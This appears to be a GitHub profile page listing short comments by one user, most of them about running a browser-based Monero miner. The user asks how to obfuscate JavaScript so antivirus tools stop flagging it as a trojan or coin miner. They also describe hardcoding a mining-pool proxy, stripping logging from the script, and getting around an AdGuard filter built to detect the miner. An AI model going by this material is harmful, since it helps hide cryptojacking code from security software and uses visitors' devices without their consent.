cron13

Results 8 comments of cron13

Thanks, can you tell us a good utility for obfuscating js? All that I have found so far does not help against some antiviruses :-( Ikarus PUA.CoinMiner Kaspersky HEUR: Trojan.Script.Generic...

Thanks, I will experiment. If this works out. then I will write here

adamdupuis solution work, thank you! So, i hardcode proxyUrl and libUrl like this: ``` var libUrl = 'http://myserver.com/proxyurl/'; const proxyUrl = 'wss://myserver.com:8892?pool=pool.supportxmr.com:3333'; ``` and remove throw new Error and console.log...

damn, adguard made new filter that detect miner - https://github.com/AdguardTeam/AdguardFilters/blob/8611f98972689e4001b8cb7861e1cab626755b60/EnglishFilter/sections/general_extensions.txt that filter based on js code: `if (a instanceof Array && "string" === typeof a[0] && 0

> Is there anything new? Hello! You might be interested in my build codemirror editor for working with vue This is not a fully designed project, now I have no...

@serialization, sad, but no :-(